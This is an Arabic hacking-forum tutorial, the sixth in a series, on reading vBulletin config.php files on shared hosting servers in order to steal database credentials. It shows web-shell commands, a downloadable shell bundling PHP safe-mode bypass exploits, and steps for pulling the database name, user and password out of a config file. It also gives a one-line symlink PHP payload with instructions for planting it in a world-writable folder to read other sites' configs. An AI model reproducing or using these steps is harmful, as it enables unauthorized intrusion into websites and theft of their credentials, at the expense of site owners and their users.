[ الدرس السادس ] كيف نحصل على بيانات الكونفيق من ثغرات السيرفر !

نقاط : 0 تاريخ التسجيل : 01/01/1970

بسم الله الرحمن الرحيم

السلام عليكم ورحمة الله وبركاته

كيف الحال والأحوال عساكم بخير ان شاء الله اخواني الأعزاء

طال عمركم درسنا في الدروس السابقة عن المسارات

وعرفنا ماهو المنتدى وعرفنا وش الهدف اللي نحتاجه من المنتدى وهو ملف ( config.php )

ويكون داخل مجلد includes الموجود داخل مجلد المنتدى !

ومساره كذا

كود:
/

home/qloob/public_html/vb/includes/config.php

qloob = اسم مستخدم الموقع المستهدف .

==================================================

اليوم راح نشرح كيف نعرض محتوى ملف config.php واهم البيانات اللي فيه

وكيف نحصل آخر ثغرات الـ php بشكل يدوي هالدرس مهم ويبيله متابعه طال عمركم

==================================================

كيف يتم قراءة ملف config.php ؟؟

من خلال شيل ch99 نروح لخانة الأوامر وننفذ هالأمر

كود:

cat /home/qloob/public_html/vb/includes/config.php
cat = امر قراءة ملف

اما المسار فهو مسار ملف الكونفيق اللي نبي نقراه لاحظوا الصورة :-

ثم راح يعرض لك شاشة فيها الأمر + محتوى ملف config.php لاحظ الصورة :-

الحين نقول اخترقنا المنتدى ووصلنا للقشطة اللي نبيهاا .. كيف نكمل الاستغلال راح تكون

بدروس قادمة بإذن الله .. لكن الحين بكمل الشرح لا تحسبون السالفه لعب عيال

طيب حنا تنفذ معانا الأمر وهذا لسبب واحد لأن السيرفر مقفل خاصية الـ Safe Mode ( الوضع الآمن )

شوفوا الصورة :-

تلاحظون ان السيف مود = Off ( غير مفعل )

وهذا السبب اللي خلانا نقدر ننفذ امر القراءة لاحضار الكونفيق

طيب لنفرض ان السيف مود = On ( مفعل ) مثل هالصورة :-

لو حاولنا ننفذ الأمر ما راح يتنفذ وبيطلع لنا شاشة الأوامر فارغة مثل الصورة :-

باختصار /

ماهو السيف مود أو الوضع الآمن ؟؟

هي خاصية اذا تم تفعيلها فإنها تقوم بعمل اعدادات امنية للسيرفر من بينها منع تنفيذ الأوامر عليه

================================

طيب حنا نبي نقرا الكونفيق و السيف مود قدامنا مسوي لنا مسمار جحا

================================

طيب والحل ؟

الحل يا طويل العمر نشوف لنا ثغرة في أي برنامج بالسيرفر نقدر من خلالها نقرا ملف الكونفيق

ومثل مانتم شايفين بالنت انتشرت الثغرات في برنامج مترجم الـ php بالسيرفر

خاصة الاصدار 4.4.4 ونقدر من خلالها ننفذ امر القراءة ونقرا ملف الكونفيق

ماهو مترجم الـ php ؟؟

هو برنامج يتركب بالسيرفر وظيفته قراءة برمجيات الـ php بالسيرفر من السكريبتات وغيرها

وحنا راح نحاول نطلع ثغرات فيه بحيث اننا نخليه بدل ما يقرا سكريبت ويترجمه لنا

راح نستخدمه ونخليه يقرا الكونفيق ويجيبه لنا بإذن الله

======================================

طبعاً ثغرات الـ php يكتشفونها الأجانب وحنا نترجمها ونجيبها لكم

وتسمعون كل فتره والثانية يقولون لك هذا شيل يتخطى السيف مود

والمقصد انه يتخطى السيف مود وينفذ لنا الأمر cat عن طريق ثغرة في الـ php

انا دمجت لكم اغلب ثغرات الـ php المكتشفه في شيل واحد

ونزلته على الرابط التالي :-

[ندعوك للتسجيل في المنتدى أو التعريف بنفسك لمعاينة هذا الرابط]

تلاحظون فيه حوالي 8 ثغرات ( شيلات ) لتخطي السيف مود مدموجه في شيل واحد وهو phphacker

وهذا راح يضيع علينا التعب كل اللي علينا نرفع الشيل على السيرفر اللي نبي نتخطاه

ثم شغلوا الشيل راح يطلع لنا بالشكل التالي :-

مثل مانتم شايفين توجد 8 ثغرات لتخطي السيف مود

وهي

ثغرة في الدالة copy في مترجم الـ php .
ثغرة في الدالة ini_restore في مترجم الـ php .
ثغرة في الدالة Curl في مترجم الـ php .
ثغرة في الدالة imap في مترجم الـ php .
ثغرة في الدالة id في مترجم الـ php .
ثغرة في الدالة plugin في مترجم الـ php .
ثغرة في الدالة symlink في مترجم الـ php .
ثغرة في برنامج mysql .

=-=

مثل ما انتم ملاحظين بالصورة انا حاط علامة اكس على ثغرة برنامج mysql

لأن استغلالها يختلف عن استغلال ثغرات الـ php وراح اشرحه بنهاية الدرس بإذن الله

وحاط علامة اكس على ثغرة الدالة symlink وهذي في برنامج php مثل الثغرات الأخرى

ولكن استغلالها يختلف عن الأخريات وراح اشرحه مع ثغرة mysql بنهاية الدرس بإذن الله

=-=

الحين مثل مانتم شايفين الثغرات قدامكم بالصورة جاهزه

كل اللي عليكم تكتبوا مسار الكونفيق في مربع الثغره ثم تضغط زر ( Read-F ) - ( قراءة الملف )

وراح يعرض لكم ملف الكونفيق بإذن الله في حال طلع لكم خطأ جرب الثغره اللي تحتها أو جنبها وهكذا

لاحظ الصورة التالية :-

مثل ما تلاحظون في الصورة انا استخدم ثغرة الدالة ini_restore

في قراءة ملف الكونفيق لموقع قلووب

اول ما تضغط الزر راح يعرض لك الكونفيق اذا ما انعرض لك الكونفيق

هذا يعني ان صاحب السيرفر مرقع الثغره اجل روح جرب اللي تحتها أو اللي جنبها

لين تقرا الكونفيق بإذن الله

========================

شرحنا استغلال ثغرات الـ php فوق ومثل ما شفتم بسيطة جداً ولا تحتاج لتعب

الحين نشرح استغلال ثغرة برنامج mysql في الشيل

طريقتها يا طويل العمر لازم يكون عندك لوحة تحكم سي بنل لموقع

وتسوي قاعدة بيانات

وهذا شرح عمل قاعدة البيانات من السي بنل للمشتركين بدورة اخوي السكربت العربي

[ندعوك للتسجيل في المنتدى أو التعريف بنفسك لمعاينة هذا الرابط]

وهذا اقتباس الشرح

اقتباس:

المشاركة الأصلية كتبت بواسطة السكربت العربي [ندعوك للتسجيل في المنتدى أو التعريف بنفسك لمعاينة هذا الرابط]
السلام عليكم ورحمة الله وبركــاته ..
إخـواني الكرام راح افصـل دروسي شوية شوية .. عشان الكل يفهـم
قررت بدال مااكتب درس يكون فيه 100 درس اخلي الدروس مفصله
لذلك هذا احد اهم اهم اهم الدروس في كل عملية تركيب سواء منتدى او مجلة
هو طريقــة عمل قاعدة بيانات أو (داتا بيس) لذلك نتوكل ع الله ونبدأ الدرس .
====
مســتوى الدرس "سهل"
وقت العمــل "خمسة دقائق"
تنفيذ "السكربت العربي"
====
الدرس "
1- نتــوجه للوحة التحكم الشهيرة الـCpanel
مثال " [ندعوك للتسجيل في المنتدى أو التعريف بنفسك لمعاينة هذا الرابط] "
مع تغيير XXX لعنوان موقعك .
2- نتوجه لخيار MySQL® Databases كمـا هو موضح .
صوره - 1

3- نذهب لخانــة New Database ونكتب امامها إسم قاعدة البيانات كما هو موضح.
صوره - 2

4- ثــم نضغط على خيــار Go Back .

5- بعد الضغط على go back والرجوع للصفحة نذهب للخيارين Username || Password
ونكتب في Username (إسم المستخدم لقاعدة البيانات)
ونكتب في Password (الرقم السري للقاعدة البيانات) . (لاحـظ الصوره ادناهـ)
صوره - 3

6- ثــم نضغط على Go Back .

7- بعـد الضغط على go back والعودة للصفحـة .. ننزل للأسف وسنجد جدول ..
نختار من الجدول إسم قاعدة البيانات + اسم المستخدم للقاعدة لنربطهم ببعضهم .
بعد إختيارهمـا نضغط على add user to database كما هو موضــح بالصوره .
صوره - 4

8- ثـم نضغط على Go Back .

وألـف مبروك تــم عمل قـاعدة البيانات بنجــاح
ملاحــظة || يرجى ملاحظـة الفــرق بيــن (إسم قاعدة البيانات) و (إسم المستخدم لقاعدة البيانات)
لان الفرق هذا راح يفرق معنا بتركيب السكربتات .
ملاحـظة _ 2 || لاتنسوني بدعائكم

طيب لنفرض ما عندنا سي بنل وش نسوي ؟؟

الموقع اللي حنا رافعين عليه الشيل شوف سكريبت عليه يعمل بقواعد البيانات

مثلاً سكريبت المنتدى

ادخل واقرا ملف الكونفيق تبعه عن طريق شيل
ch99

اول ما تستعرضه بيطلع لك الكونفيق طويل مره

كيف نطلع بيانات قاعدة البيانات اللي هي (
اسم القاعدة + اسم المستخدم + كلمة المرور )

ادخل الكونفيق وابحث عن العبارة التالية :

كود:

$config['Database']['dbname'] =

مثلاً طلع لنا كذا :-

كود:

$config['Database']['dbname'] = 'qllob_vb';

السطر هذا ما يهمنا فيه هو ان اسم قاعدة البيانات هو : qllob_vb

تمام

الحين نبحث عن السطر هذا بعد في الكونفيق

كود:

$config['MasterServer']['username'] =

مثلاً طلع لنا كذا :-

كود:

$config['MasterServer']['username'] = 'qllob_tot';

هذا يعني ان اسم مستخدم قاعدة البيانات هو : qllob_tot

تمام

الحين نبحث عن السطر هذا :-

كود:

$config['MasterServer']['password'] =

مثلاً طلع لنا كذا :-

كود:

$config['MasterServer']['password'] = '123654';

هذا يعني ان كلمة مرور قاعدة البيانات هي : 123654

تماام

تعالوا نشوف البيانات اللي طلعناها

=========================
اسم قاعدة البيانات : qllob_vb
اسم مستخدم قاعدة البيانات : qllob_tot
كلمة مرور قاعدة البيانات : 123654
=========================

تماام جداً والحمد لله

الحين روح لملف الشيل في جهازك وهو
phphacker.php

واضغط عليه بزر الماوس الأيمن ثم اختار فتح باستخدام ثم اختار برنامج المفكرة

كما بالصورة :-

الحين راح يفتح لنا السورس كود للشيل

اضغط في الكيبورد على
Ctrl + F

وراح يطلع لك شاشة البحث اكتب في المربع العبارة التالية :-

Editing By User

واضغط على زر (
بحث عن التالي )

راح ينزلك تحت عن الخانة اللي نبيها لاحظ الصورة :-

شوفوا الخانات اللي انا مرقمها >> خويتي

ضع في خانة (
$muser ) = " اسم مستخدم قاعدة البيانات "
ضع في خانة ( $mpass ) = " كلمة مرور قاعدة البيانات "
ضع في خانة ( $mdb ) = " اسم قاعدة البيانات "

وحنا مثل ما طلعنا فوق في شرحنا ان قاعدة البيانات اللي عندنا هذي بياناتها

اسم قاعدة البيانات : qllob_vb
اسم مستخدم قاعدة البيانات : qllob_tot
كلمة مرور قاعدة البيانات : 123654

نعبيها في الشيل وراح تصير مثل هالصورة :-

تمااام الحين

في اعلى المفكرة ادل على قائمة ملف ثم حفظ

الحين روح وارفع الشيل على السيرفر ثم اكتب فيه مسار كونفيق اي منتدى تبي تقراه

في خانة ثغرة
sql ونفذ الأمر وبإذن الله راح يسحب لك كونفيق المنتدى

وبكذا قدرنا نستغل ثغرة
mysql لتخطي السيف مود

الحين نجي لآخر ثغرة وهي ثغرة الدالة
symlink

كيف نستغلها ؟

الطريقة طال عمركم

الاستغلال اللي انا مسويه في شيل
phphacker صعب شوي

أنا راح أعطيكم اسهل استغلال واقوى استغلال

تفضلوا هذا الشيل

كود:

<? symlink ("/home/qloob/public_html/vb/includes/config.php", "/home/ksa/public_html/file.txt");?>
انسخ الكود فوق واكتبه في ملف مفكرة ثم ادخل ملف وحفظ بإسم واختار في خانة النوعية : all files

واسم الملف اكتب :
sym.php

واحفظه بسطح المكتب

الحين روح سطح المكتب بتلقى ملف شيل بإسم
sym.php

افتحه بالمفكرة بنفس الطريقة بزر الماوس الأيمن ثم فتح باستخدام ثم المفكرة

واستبدل هالمسار

كود:

/home/qloob/public_html/vb/includes/config.php

بمسار ملف الكونفيق اللي تبي تقراه

ثم روح شيل
ch99 بالموقع وشوف لك مجلد مصرح 777 وادخله

وارفع بداخله ملف مفكرة فارغ بإسم
file.txt

وانسخ مساره (
هذا يعتمد على اللي فاهم درس المسارات )

مثلاً حنا داخل هالمسار

كود:

/home/ksa/public_html/images

يعني مجلد images مصرح 777

راح يكون مسار ملف
file.txt هو

كود:

/home/ksa/public_html/images/file.txt

ننسخ هالمسار ونلصق بملف الشيل بدل

كود:

/home/ksa/public_html/file.txt

ثم ارفع الشيل sym.php داخل مجلد images او المجلد المصرح 777

وروح شغله عبر المتصفح راح تطلع لك صفحة بيضاء

الحين روح ملف
file.txt وافتحه تلقى الكونفيق داخله

عمل الثغره /

انها تنسخ بيانات ملف الكونفيق

ثم تلصقه داخل ملف
file.txt

وبكذا نكون استغلينا ثغرة
symlink بأفضل طريقة ولله الحمد

كذا انتهينا من هالدرس

والدرس القادم راح يكون بإذن الله عن

ماهو الزند ؟ وكيفية فك تشفيره وكيف تطلع مسار الكونفيق لو تغير .. الخ

=======================================

( هذا الجزء خاص فقط لخبراء الـ php واللغة الانجليزية )

كيف نحصل ثغرات الـ
php بنفسنا ؟؟

اغلب ثغرات الـ
php مكتشفه من شخص واحد اسمه ماكسيميليان وهذا موقعه

[ندعوك للتسجيل في المنتدى أو التعريف بنفسك لمعاينة هذا الرابط]

كل ما يكتشف ثغرة ينزل شرحها مع كيفية الاستغلال (
Exploit ) وكيفية الحماية منها

طبعاً اللي له خبرة في الانجليش وخبرة بسيطة في الـ
php

يقدر يقرا الثغرات اللي ينزلها ويكتب استغلالها ببساطة

اول ما تدخلون الصفحة الرئيسية للموقع تقلون آخر ثغرات الـ
php المكتشفه مثل الصورة :-

مثل مانتم شايفين فيه
4 ثغرات جديدة

والثغره الأولى تقول لك اصدارات المترجمات المصابه

اضغط عليها واقرا عن الثغره وحاول تكتب استغلال وتتابع الشرح لها بالانجليش

اترك لكم اكتشاف العديد من المزايا .. وفقكم الله

==================================

أسئلة اليوم :

هذا شيل انا رافعه :

[ندعوك للتسجيل في المنتدى أو التعريف بنفسك لمعاينة هذا الرابط]
واسم مستخدم الموقع هو : hck كيف راح يكون مسار ملف ch99.php باللينكس ؟

مثلاً : /home/....

» [ الدرس الرابع ] طرقي الخاصه لرفع الشيل على السيرفر !
» [ الدرس الثالث ] كيفية رفع الشيل عبر ثغرات File Include
» [ الدرس الخامس عشر ] ثغرات المتصفح .. والحصول على أحدثها .. والتشفير ~
» شرح استغلال ثغرات البيرل
» افتراضي ثغرات جديدة في منتديات phpbb2